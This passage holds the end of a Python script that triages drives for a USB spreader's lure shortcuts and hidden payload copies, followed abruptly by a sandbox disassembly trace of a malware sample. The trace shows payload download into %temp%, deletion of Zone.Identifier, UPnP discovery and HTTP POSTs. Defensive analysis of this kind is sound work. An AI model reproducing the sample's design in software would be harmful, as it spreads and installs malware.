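FILE_ATTRIBUTE_HIDDEN = 0x2   # value passed to SetFileAttributesW above
LURE_RE = re.compile(r"^(?P<label>.+) \((?P<gb>\d+)GB\)\.lnk$", re.IGNORECASE)


def visible_drives(logical_drives: int, nodrives_policy: int = 0) -> list:
    """Letters set in GetLogicalDrives() and not masked by the Explorer
    NoDrives policy (bit 0 = A:, bit 1 = B:, ...), which the sample reads
    from the Policies/Explorer key before walking drives."""
    return [ch for i, ch in enumerate(string.ascii_uppercase)
            if logical_drives >> i & 1 and not nodrives_policy >> i & 1]


def lure_name(volume_label: str, total_bytes: int) -> str:
    """Shortcut stem built from the volume label (or "Unnamed volume") and the
    total size in GiB from GetDiskFreeSpaceExW. The space between label and
    size is this example's assumption; the report only shows "%s%s"/"(%dGB)"."""
    return f"{volume_label or 'Unnamed volume'} ({total_bytes // GIB}GB)"


def is_hidden(path: str) -> bool:
    """Hidden-attribute check; st_file_attributes exists only on Windows."""
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    return bool(attrs & FILE_ATTRIBUTE_HIDDEN)


def triage_drive(root: str, volume_label: str = "", total_bytes: int = 0) -> list:
    """Walk a mounted drive and report the spreader's artefacts."""
    expected = (lure_name(volume_label, total_bytes) + ".lnk").lower()
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if is_hidden(os.path.join(dirpath, d)):
                findings.append({"kind": "hidden-dir", "path": os.path.join(dirpath, d)})
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name.lower() == PAYLOAD_NAME:
                findings.append({"kind": "payload-copy", "path": path})
            elif LURE_RE.match(name):
                findings.append({"kind": "lure-lnk", "path": path,
                                 "matches_volume": name.lower() == expected})
    return findings


def build_constructed_drive() -> str:
    """Throwaway directory shaped like a drive after infection. Constructed
    test data: empty files, no real binary. The hidden directory's real name
    is not in the report, so a placeholder is used."""
    root = tempfile.mkdtemp(prefix="usb-triage-")
    os.makedirs(os.path.join(root, "placeholder_dir"))
    os.makedirs(os.path.join(root, "Documents"))
    for rel in ("USB DRIVE (14GB).lnk",
                os.path.join("placeholder_dir", "VolDrvConfig.exe"),
                os.path.join("Documents", "report.docx")):
        open(os.path.join(root, rel), "w").close()
    return root


if __name__ == "__main__":
    drive = build_constructed_drive()
    for finding in triage_drive(drive, volume_label="USB DRIVE", total_bytes=14 * GIB):
        print(finding)
```

On a real drive, pass the label and total size the operating system reports so that `matches_volume` tells a lure built for this volume apart from one carried over from another host; the hidden-directory check only fires on Windows, where the attribute set by SetFileAttributesW is visible.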
                                              APIs
                                              • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                              • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                • Part of subcall function 0040D6C0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D6DE
                                              • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                              • setsockopt.WS2_32 ref: 004020D1
                                              • htons.WS2_32(?), ref: 00402101
                                              • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                              • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                              • WSACreateEvent.WS2_32 ref: 0040213A
                                              • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                • Part of subcall function 0040D6F0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D714
                                                • Part of subcall function 0040D6F0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D76F
                                                • Part of subcall function 0040D6F0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D7AC
                                                • Part of subcall function 0040D6F0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D7B7
                                                • Part of subcall function 0040D6F0: DuplicateHandle.KERNEL32(00000000), ref: 0040D7BE
                                                • Part of subcall function 0040D6F0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D7D2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                              • String ID:
                                              • API String ID: 1603358586-0
                                              • Opcode ID: 23dfeb1008158e2e0cd7513cecaa842fef64be5ff76144f1ff25a44a66e0fb2a
                                              • Instruction ID: 5f4ab44496f95361e3b7ac477a06260d9546e6561ad256066a099106afd7ac33
                                              • Opcode Fuzzy Hash: 23dfeb1008158e2e0cd7513cecaa842fef64be5ff76144f1ff25a44a66e0fb2a
                                              • Instruction Fuzzy Hash: 2B41C070640701BBD3209F649D0AF4B77E4AF44720F108A2DF6A9EA2D4E7F4E445875A
                                              APIs
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 0040DCBA
                                              • htons.WS2_32(0000076C), ref: 0040DCF0
                                              • inet_addr.WS2_32(239.255.255.250), ref: 0040DCFF
                                              • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DD1D
                                                • Part of subcall function 0040B010: htons.WS2_32(00000050), ref: 0040B03D
                                                • Part of subcall function 0040B010: socket.WS2_32(00000002,00000001,00000000), ref: 0040B05D
                                                • Part of subcall function 0040B010: connect.WS2_32(000000FF,?,00000010), ref: 0040B076
                                                • Part of subcall function 0040B010: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B0A8
                                              • bind.WS2_32(000000FF,?,00000010), ref: 0040DD53
                                              • lstrlenA.KERNEL32(00411D70,00000000,?,00000010), ref: 0040DD6C
                                              • sendto.WS2_32(000000FF,00411D70,00000000), ref: 0040DD7B
                                              • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DD95
                                                • Part of subcall function 0040DE20: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DE6E
                                                • Part of subcall function 0040DE20: Sleep.KERNEL32(000003E8), ref: 0040DE7E
                                                • Part of subcall function 0040DE20: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DE9B
                                                • Part of subcall function 0040DE20: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DEB1
                                                • Part of subcall function 0040DE20: StrChrA.SHLWAPI(?,0000000D), ref: 0040DEDE
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                              • String ID: 239.255.255.250
                                              • API String ID: 726339449-2186272203
                                              • Opcode ID: 67bb0c7a586e0ff2326b65c0e0cd249105ca887c7b19898e2fcb7942032de1f3
                                              • Instruction ID: 4840ad5dfb28dde6295409afe741e8bd11bfa900d245e54f0039e4319b19f377
                                              • Opcode Fuzzy Hash: 67bb0c7a586e0ff2326b65c0e0cd249105ca887c7b19898e2fcb7942032de1f3
                                              • Instruction Fuzzy Hash: 7C41D8B4E00208ABDB14DFE4E889BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                              • htons.WS2_32(?), ref: 00401508
                                              • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                              • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                              • String ID:
                                              • API String ID: 4174406920-0
                                              • Opcode ID: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                              • Instruction ID: ab17557c7f530dee2ff78f8644a874c55f5dae77ec0fdd8d5eef9b2878869d10
                                              • Opcode Fuzzy Hash: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                              • Instruction Fuzzy Hash: 6031C871A44301AFE320DF649C46F9BB6E0AF48B14F40493DF695EB2E0D3B5D544879A
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040D292
                                              • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D2B8
                                              • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D2EF
                                              • GetTickCount.KERNEL32 ref: 0040D304
                                              • Sleep.KERNEL32(00000001), ref: 0040D324
                                              • GetTickCount.KERNEL32 ref: 0040D32A
                                              Yara matches
                                              Similarity
                                              • API ID: CountTick$Sleepioctlsocketrecv
                                              • String ID:
                                              • API String ID: 107502007-0
                                              • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                              • Instruction ID: 4b62ca25e6cdc7f9b2e1b521222d8c0dfc3b1f9d22396e6cb4543525420831ef
                                              • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                              • Instruction Fuzzy Hash: 1F31E874D00209EFCB14DFA8D948AEEB7B0FF44315F108669E825A7290D7749A94CB59
                                              APIs
                                              • htons.WS2_32(00000050), ref: 0040B03D
                                                • Part of subcall function 0040AFD0: inet_addr.WS2_32(0040B051), ref: 0040AFDA
                                                • Part of subcall function 0040AFD0: gethostbyname.WS2_32(?), ref: 0040AFED
                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0040B05D
                                              • connect.WS2_32(000000FF,?,00000010), ref: 0040B076
                                              • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B0A8
                                              Strings
                                              • www.update.microsoft.com, xrefs: 0040B047
                                              Yara matches
                                              Similarity
                                              • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                              • String ID: www.update.microsoft.com
                                              • API String ID: 4063137541-1705189816
                                              • Opcode ID: 1adbfc87e4e946ee119d9e5b2ddfdf65343185abbb22bc100f48905234863ed2
                                              • Instruction ID: 0ae4650424ba83aa22eef998e17282091954cac8fd9820034268e2ac291e36ad
                                              • Opcode Fuzzy Hash: 1adbfc87e4e946ee119d9e5b2ddfdf65343185abbb22bc100f48905234863ed2
                                              • Instruction Fuzzy Hash: 4A212CB4D102099BDB04DFE4D946BEFBBB4AF08310F104169E515B7390E7745A44CBAA
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DAED,00000000), ref: 004013D5
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                              • bind.WS2_32(?,?,00000010), ref: 00401429
                                                • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                              • String ID:
                                              • API String ID: 3943618503-0
                                              • Opcode ID: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                              • Instruction ID: d62f3833751a539e27b625c66b0fe154f308ce322b9d6d34e226f7a30690eb36
                                              • Opcode Fuzzy Hash: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                              • Instruction Fuzzy Hash: 5C118974A40710AFE360DF749C0AF877AE0AF04B54F50892DF599E72E1E3F49544879A
                                              APIs
                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                              • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                              • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                              Yara matches
                                              Similarity
                                              • API ID: Recv$ErrorLastSleep
                                              • String ID:
                                              • API String ID: 3668019968-0
                                              • Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                              • Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
                                              • Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                              • Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6
                                              APIs
                                                • Part of subcall function 00405630: lstrlenA.KERNEL32(00000000), ref: 00405647
                                              • SysAllocString.OLEAUT32(00000000), ref: 0040E06E
                                              • CoCreateInstance.OLE32(00412A18,00000000,00004401,00412A08,00000000), ref: 0040E096
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E131
                                              Yara matches
                                              Similarity
                                              • API ID: String$AllocCreateFreeInstancelstrlen
                                              • String ID:
                                              • API String ID: 2697797874-0
                                              • Opcode ID: 45bdf66638a553dec9b64523f646afcf61dabc29da059ab6423e5f8cb98debcd
                                              • Instruction ID: 223d06f0ec078b81949309064c5540d38f641d7abc0d68c81da219df943d49a2
                                              • Opcode Fuzzy Hash: 45bdf66638a553dec9b64523f646afcf61dabc29da059ab6423e5f8cb98debcd
                                              • Instruction Fuzzy Hash: 37310E75A00208AFDB04DF94CC95FEEB7B5AF88710F1085A8E615AB3E0D775AE91CB44
                                              APIs
                                              • CryptAcquireContextW.ADVAPI32(00407FCF,00000000,00000000,00000001,F0000040,?,?,0040C469,00407FCF,00000004,?,?,0040C49E,000000FF), ref: 0040C423
                                              • CryptGenRandom.ADVAPI32(00407FCF,?,00000000,?,?,0040C469,00407FCF,00000004,?,?,0040C49E,000000FF), ref: 0040C439
                                              • CryptReleaseContext.ADVAPI32(00407FCF,00000000,?,?,0040C469,00407FCF,00000004,?,?,0040C49E,000000FF), ref: 0040C445
                                              Yara matches
                                              Similarity
                                              • API ID: Crypt$Context$AcquireRandomRelease
                                              • String ID:
                                              • API String ID: 1815803762-0
                                              • Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                              • Instruction ID: 6943664ffc8d3a105bd4ceed40135057dfa4a41f6174007770034458561b6d1a
                                              • Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                              • Instruction Fuzzy Hash: 0BE01275650208BBDB24CFD5EC49FDA776CEB48700F104154F70997190DAB5EA4097A9
                                              APIs
                                              • NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
                                              • RtlTimeToSecondsSince1980.NTDLL(0040B945,?), ref: 0040DA48
                                              Yara matches
                                              Similarity
                                              • API ID: Time$QuerySecondsSince1980System
                                              • String ID:
                                              • API String ID: 1987401769-0
                                              • Opcode ID: 0613ca7d0cb934da7a106d9058381de88b753c7355ee9c1788c1bc259270ea14
                                              • Instruction ID: 71f66deb3bce6efc95a111259a7627df0bb84068fda71d22670a2dc98323c2b1
                                              • Opcode Fuzzy Hash: 0613ca7d0cb934da7a106d9058381de88b753c7355ee9c1788c1bc259270ea14
                                              • Instruction Fuzzy Hash: 4FD09E79C4010DABCB04DBE4E849CDDB77CEA44201F0086D5AD1592150EAB066588B95
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3916222277
                                              • Opcode ID: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                              • Instruction ID: 5fd1260cd0c1bb1f0d43ca887b35fd9fe7aa376b80e30ba4f5f1b1723d8df557
                                              • Opcode Fuzzy Hash: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                              • Instruction Fuzzy Hash: 2C124FF5D00109ABCF14DF98D985AEFB7B5BB98304F10816DE609B7380D739AA41CBA5
                                              APIs
                                              • NtQueryVirtualMemory.NTDLL ref: 0040F71A
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryQueryVirtual
                                              • String ID:
                                              • API String ID: 2850889275-0
                                              • Opcode ID: 553652da4901750b097e7af2027d9c2c64a94e5110a95061c8020036af5c5e13
                                              • Instruction ID: c0d74598983d3c40a1cba1c5619970ca770d062c6a6589d1e52c28c523225233
                                              • Opcode Fuzzy Hash: 553652da4901750b097e7af2027d9c2c64a94e5110a95061c8020036af5c5e13
                                              • Instruction Fuzzy Hash: 1361D632A006028BDB39DF29C8806AA73E1EB85354F34C53FD851E7AD0E739DC4AC649
                                              APIs
                                              • GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A48C
                                              Yara matches
                                              Similarity
                                              • API ID: HeapsProcess
                                              • String ID:
                                              • API String ID: 1420622215-0
                                              • Opcode ID: 5782e1b582b7a748a5e7f01d040a799827bb7b6b497027464f6411c4e1fb9ee6
                                              • Instruction ID: 6c519ec662c8298c92b433522cbc543683dcf9427bd1d055406e8132846e7857
                                              • Opcode Fuzzy Hash: 5782e1b582b7a748a5e7f01d040a799827bb7b6b497027464f6411c4e1fb9ee6
                                              • Instruction Fuzzy Hash: 6901ECB4904268CADB208F14D988BA9B774BB45304F1081EAD71976281C3B82EDADF5F
                                              • Opcode ID: 273f1a78c8c3246261b393e2372c129719d8c4f288108f15368615b00390e82d
                                              • Instruction ID: 37e1522ff6c285f75b58007950fcecb12f6e209eb0edb739df16a863c33eadfe
                                              • Instruction Fuzzy Hash: DB127CB4D002199FCB48CF99D991AAEFBB2FF88304F24856AE415BB345D734AA11CF54
                                              • Opcode ID: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                              • Instruction ID: d2654b517134af6cf63505f3f822924ca03571e2a680a0b95264841177f41a12
                                              • Instruction Fuzzy Hash: 3321B832900204AFCB20EF69C8C0967B7A5FF45310B458579DD59AB685D734F919C7E0

                                              Control-flow Graph

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040F079
                                              • srand.MSVCRT ref: 0040F080
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F0A0
                                              • strlen.NTDLL ref: 0040F0AA
                                              • mbstowcs.NTDLL ref: 0040F0C1
                                              • rand.MSVCRT ref: 0040F0C9
                                              • rand.MSVCRT ref: 0040F0DD
                                              • wsprintfW.USER32 ref: 0040F104
                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F11A
                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F149
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F178
                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F1AB
                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F1DC
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F1EB
                                              • wsprintfW.USER32 ref: 0040F204
                                              • DeleteFileW.KERNEL32(?), ref: 0040F214
                                              • Sleep.KERNEL32(000003E8), ref: 0040F21F
                                              • Sleep.KERNEL32(000007D0), ref: 0040F240
                                              • ExitProcess.KERNEL32 ref: 0040F268
                                              • DeleteFileW.KERNEL32(?), ref: 0040F27E
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F28B
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F298
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F2A5
                                              • Sleep.KERNEL32(000003E8), ref: 0040F2B0
                                              • rand.MSVCRT ref: 0040F2C5
                                              • Sleep.KERNEL32 ref: 0040F2DC
                                              • rand.MSVCRT ref: 0040F2E2
                                              • rand.MSVCRT ref: 0040F2F6
                                              • wsprintfW.USER32 ref: 0040F31D
                                              • DeleteUrlCacheEntryW.WININET(?), ref: 0040F32D
                                              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F347
                                              • wsprintfW.USER32 ref: 0040F367
                                              • DeleteFileW.KERNEL32(?), ref: 0040F377
                                              • Sleep.KERNEL32(000003E8), ref: 0040F382
                                              • Sleep.KERNEL32(000007D0), ref: 0040F3A3
                                              • ExitProcess.KERNEL32 ref: 0040F3CA
                                              • DeleteFileW.KERNEL32(?), ref: 0040F3D9
                                              Strings
                                              • %s:Zone.Identifier, xrefs: 0040F35B
                                              • %s\%d%d.exe, xrefs: 0040F311
                                              • %s\%d%d.exe, xrefs: 0040F0F8
                                              • %temp%, xrefs: 0040F09B
                                              • %s:Zone.Identifier, xrefs: 0040F1F8
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040F115
                                              Similarity
                                              • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                              • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                              • API String ID: 3526668077-2417596247
                                              • Opcode ID: 177b7b3acfa94a5b51c3703646bd270f7b108043caf1cdc0d286447494698f43
                                              • Instruction ID: d1b69f2f4fd2238e53d437ba447cd35dd01203c47a8128eb559f47a2066d0ae0
                                              • Instruction Fuzzy Hash: 7691CBB5940318ABE720DB60DC49FE93779AB88701F0484F9F609A51D1DBB99AD4CF28

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 0040B360: gethostname.WS2_32(?,00000100), ref: 0040B37C
                                                • Part of subcall function 0040B360: gethostbyname.WS2_32(?), ref: 0040B38E
                                              • strcmp.NTDLL ref: 0040B460
                                              Similarity
                                              • API ID: gethostbynamegethostnamestrcmp
                                              • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                              • API String ID: 2906596889-2213908610
                                              • Opcode ID: 5dde0825bd444be26dad4d2e0a68fa3133cd9c23aadc8b3786c6e5e0e51f72e0
                                              • Instruction ID: bd96892130d723efa302dbc8dbf9c53b9c7bf10ac090126f1a0951e43edd4a65
                                              • Instruction Fuzzy Hash: 0C6181B5A04205A7CB10AF61EC46AAB7774AB10308F14847AF805B73C2E73DE655C6DF

                                              Control-flow Graph

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040192C
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                              • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                              • accept.WS2_32(?,?,?), ref: 004019A8
                                              • GetTickCount.KERNEL32 ref: 004019F6
                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                              • GetTickCount.KERNEL32 ref: 00401A43
                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                              • GetTickCount.KERNEL32 ref: 00401AAB
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                              Similarity
                                              • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                              • String ID: PCOI$ilci
                                              • API String ID: 3345448188-3762367603
                                              • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                              • Instruction ID: 052bb906b72d623838b809fd2f084fe798b134d15a2779f83897d066d1444b79
                                              • Instruction Fuzzy Hash: 3441F471600300ABCB209F74DC8CB9B77A9AF44720F14463DF895A72E1DB78E881CB99

                                              Control-flow Graph

                                              APIs
                                              • memset.NTDLL ref: 0040EAA8
                                              • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EAF8
                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EB0B
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EB44
                                              • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040EB7A
                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040EBA5
                                              • HttpSendRequestA.WININET(00000000,004120C8,000000FF,00009E34), ref: 0040EBCF
                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040EC0E
                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040EC60
                                              • InternetCloseHandle.WININET(00000000), ref: 0040EC91
                                              • InternetCloseHandle.WININET(00000000), ref: 0040EC9E
                                              • InternetCloseHandle.WININET(00000000), ref: 0040ECAB
                                              Similarity
                                              • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                              • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                              • API String ID: 2761394606-2217117414
                                              • Opcode ID: 8a56ad483b9ace5c80fef8412a232ec04f9eaa1d9d9d993c01397f9ec31f5831
                                              • Instruction ID: c905a0693736bdbf34c7f8e0e7db626079e62ceb693e66bb4324beed71749724
                                              • Instruction Fuzzy Hash: 33514CB5901228ABDB26CF54CC94BDDB7BCAB48705F0481E9B60DA6280C7B96FC4CF54

                                              Control-flow Graph

                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                              • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                              • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                              • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                              • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                              • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                              • WSACloseEvent.WS2_32(?), ref: 00401715
                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                              Similarity
                                              • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                              • String ID: PCOI$ilci
                                              • API String ID: 2403999931-3762367603
                                              • Opcode ID: af844558824ef2f0cd234010a78707101b1275eb600f87e7949f258bb1116b4d
                                              • Instruction ID: 5b8540bf1bb466d15bf787bf2847de779fcfe5b3cc035b7f1a74ac98c73710f1
                                              • Instruction Fuzzy Hash: D731A875900705ABC710EF70EC48B97B7B8BF08710F048A2AF559A3691C779F894CB98

                                              Control-flow Graph

                                              APIs
                                              • memset.NTDLL ref: 00405838
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                              • Sleep.KERNEL32(00000001), ref: 00405864
                                              • GetTickCount.KERNEL32 ref: 0040586A
                                              • GetTickCount.KERNEL32 ref: 00405873
                                              • wsprintfW.USER32 ref: 00405886
                                              • RegisterClassExW.USER32(00000030), ref: 00405893
                                              • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                              • TranslateMessage.USER32(?), ref: 004058E5
                                              • DispatchMessageA.USER32(?), ref: 004058EF
                                              • ExitThread.KERNEL32 ref: 00405901
                                              Similarity
                                              • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                              • String ID: %x%X$0
                                              • API String ID: 716646876-225668902
                                              • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
